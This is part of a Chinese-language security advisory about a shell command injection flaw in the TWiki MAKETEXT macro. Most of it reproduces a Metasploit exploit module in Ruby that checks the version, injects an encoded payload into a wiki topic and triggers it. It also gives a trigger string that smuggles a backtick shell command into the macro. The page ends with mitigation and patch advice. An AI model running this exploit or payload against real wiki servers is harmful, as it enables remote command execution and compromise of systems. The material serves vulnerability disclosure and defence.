TWiki twiki/lib/TWiki.pm MAKETEXT宏任意shell命令注入漏洞(3)

if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/
            print_warning("Error injecting the payload")
            print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
            return nil
        end

location = URI(res.headers['Location']).path
        print_good("Payload injected on #{location}")

return location
    end

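# Passive version check: requests the TWiki.WebHome topic and reads the
# version banner from the response body. No payload is sent.
#
# Returns:
#   Exploit::CheckCode::Unknown  - no response, or a status other than 200
#   Exploit::CheckCode::Appears  - banner version is lower than 5.1.3
#   Exploit::CheckCode::Safe     - banner version is 5.1.3 or higher
#   Exploit::CheckCode::Detected - 200 response without a version banner
#
# NOTE(review): the verdict rests on the banner alone. A host that was
# patched without a version change, or that has
# {UserInterfaceInternationalisation} set to 0, would presumably still be
# reported as Appears - confirm against the host configuration.
def check
    @base = target_uri.path
    @base << '/' unless @base.end_with?('/')

    res = send_request_cgi({
        'uri' => "#{@base}do/view/TWiki/WebHome"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    # Accept multi-digit components so that e.g. "5.1.10" is not cut to "5.1.1".
    banner = res.body.to_s.match(/This site is running TWiki version.*TWiki-(\d+\.\d+\.\d+)/)
    return Exploit::CheckCode::Detected unless banner

    version = banner[1]
    print_status("Version found: #{version}")

    # Compare numerically, component by component; a plain string comparison
    # would rank "5.1.10" below "5.1.3".
    first_safe = [5, 1, 3]
    if (version.split('.').map(&:to_i) <=> first_safe) < 0
        Exploit::CheckCode::Appears
    else
        Exploit::CheckCode::Safe
    end
end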


    # Runs the module end to end: picks the target topic, optionally logs in,
    # stores the encoded payload via inject_code, then requests the location
    # that inject_code returned.
    #
    # Every failure path goes through fail_with(Exploit::Failure::Unknown, ...).
    #
    # Observable traits for log review, all read directly from this method:
    #   * with no TwikiPage option the topic is /Sandbox/ followed by two
    #     capitalised three-letter random words;
    #   * the final request carries a TWIKISID cookie (empty when no
    #     credentials are configured);
    #   * success is reported only on a 200 response whose body matches /HASH/.
    def exploit
        # Target topic: the configured TwikiPage (forced to start with '/'),
        # otherwise a random name under /Sandbox.
        topic = datastore['TwikiPage']
        @page = ''
        if topic && !topic.empty?
            @page << '/' if topic[0] != '/'
            @page << topic
        else
            first_word = rand_text_alpha_lower(3).capitalize
            second_word = rand_text_alpha_lower(3).capitalize
            @page << "/Sandbox/#{first_word}#{second_word}"
        end

        # Base path always ends with a slash.
        @base = target_uri.path
        @base << '/' unless @base.end_with?('/')

        # Log in only when both a username and a password are set.
        user = datastore['USERNAME']
        pass = datastore['PASSWORD']
        have_credentials = user && !user.empty? && pass && !pass.empty?

        if have_credentials
            print_status("Trying login to get session ID...")
            session = do_login(user, pass)
        else
            print_status("Using anonymous access...")
            session = ""
        end

        # The empty string used for anonymous access is truthy, so only a
        # nil/false result from do_login stops here.
        fail_with(Exploit::Failure::Unknown, "Error getting a session ID") unless session

        # Store the payload; inject_code returns the path to request, or nil.
        print_status("Trying to inject the payload on #{@page}...")
        location = inject_code(session, payload.encoded)
        fail_with(Exploit::Failure::Unknown, "Error injecting the payload") unless location

        # Request the returned location once with the session cookie.
        print_status("Executing the payload through #{location}...")
        response = send_request_cgi({
            'uri'    => location,
            'cookie' => "TWIKISID=#{session}"
        })
        executed = response && response.code == 200 && response.body =~ /HASH/
        fail_with(Exploit::Failure::Unknown, "Error executing the payload") unless executed

        print_good("Exploitation was successful")
    end

end

=begin

* Trigger:

%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%

=end

建议:
--------------------------------------------------------------------------------
临时解决方法:
 
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
 
* 将配置项 {UserInterfaceInternationalisation} 设置为 0,禁用界面本地化(国际化)功能。这只是临时缓解措施,仍应尽快安装厂商补丁或升级。
 
厂商补丁:
 
TWiki
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
